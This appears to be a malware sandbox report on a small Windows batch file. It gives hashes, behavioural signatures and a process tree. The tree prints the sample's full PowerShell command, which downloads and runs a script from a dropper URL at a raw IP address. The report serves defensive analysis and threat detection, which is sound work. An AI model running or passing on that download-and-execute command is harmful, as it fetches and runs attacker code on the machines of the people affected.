Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows10_x64 -
resource
win10 -
submitted
16-07-2020 05:10
Static task
static1
Behavioral task
behavioral1
Sample
594f735f38e39066e0ea5392e1a93dba.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
594f735f38e39066e0ea5392e1a93dba.bat
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
594f735f38e39066e0ea5392e1a93dba.bat
-
Size
219B
-
MD5
2dcb6e0063636fed2c26c0b88d389592
-
SHA1
001718f5ec05cecbdd87d1950fb13fa8e8b1c93f
-
SHA256
4df4f51379a5fdc56671e999a52ac96c8b4fd0194a2af6f602bc7fc20825ea1a
-
SHA512
a3157d8ad3f0a88b822774239cdfb1ea7e15fcd89b8061310656239ff64a0480f1ef9a8d70fee76e759de63cb31eeb29f175518776a93c7951f90228abdb4644
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/594f735f38e39066e0ea5392e1a93dba
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3676 wrote to memory of 4044 3676 cmd.exe powershell.exe PID 3676 wrote to memory of 4044 3676 cmd.exe powershell.exe PID 3676 wrote to memory of 4044 3676 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3852 4044 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3852 WerFault.exe Token: SeBackupPrivilege 3852 WerFault.exe Token: SeDebugPrivilege 3852 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3852 WerFault.exe 3852 WerFault.exe 3852 WerFault.exe 3852 WerFault.exe 3852 WerFault.exe 3852 WerFault.exe 3852 WerFault.exe 3852 WerFault.exe 3852 WerFault.exe 3852 WerFault.exe 3852 WerFault.exe 3852 WerFault.exe 3852 WerFault.exe 3852 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\594f735f38e39066e0ea5392e1a93dba.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/594f735f38e39066e0ea5392e1a93dba');Invoke-SWAGNDKFQZBV;Start-Sleep -s 10000"2⤵PID:4044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3852